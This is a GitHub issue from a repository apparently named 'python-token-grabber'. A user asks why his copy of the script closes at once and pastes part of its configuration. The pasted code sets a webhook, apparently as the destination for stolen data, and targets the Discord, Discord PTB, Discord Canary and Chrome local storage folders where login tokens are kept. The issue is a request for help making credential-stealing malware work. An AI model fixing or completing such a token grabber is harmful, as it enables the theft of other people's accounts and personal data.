python-token-grabber icon indicating copy to clipboard operation
python-token-grabber copied to clipboard

It instantly closes

Open Petar252525 opened this issue 4 years ago • 0 comments

I changed the inside to what it needed to be but when i start it, it instantly closes.

hook = Webhook('gSocYG8uVFC7itiksUhhQCyTBjkLbZ6Bo7S3Q8Amatkj3WmtigE07Ghmvw3ft7XrkW9g') path = os.getenv('APPDATA') localpath = os.getenv('LOCALAPPDATA') user = os.getenv('maicamati') pc_name = os.environ['This Pc'] temp_dir = localpath+"\temp\" tokendir = path+"\Discord\Local Storage\leveldb\" ptbtokendir = path+"\discordptb\Local Storage\leveldb\" canarytokendir = path+"\discordcanary\Local Storage\leveldb\" chromedir = localpath + "\Google\Chrome\User Data\Default\Local Storage\leveldb\"

Please lmk whats wrong

Petar252525 avatar Feb 05 '21 07:02 Petar252525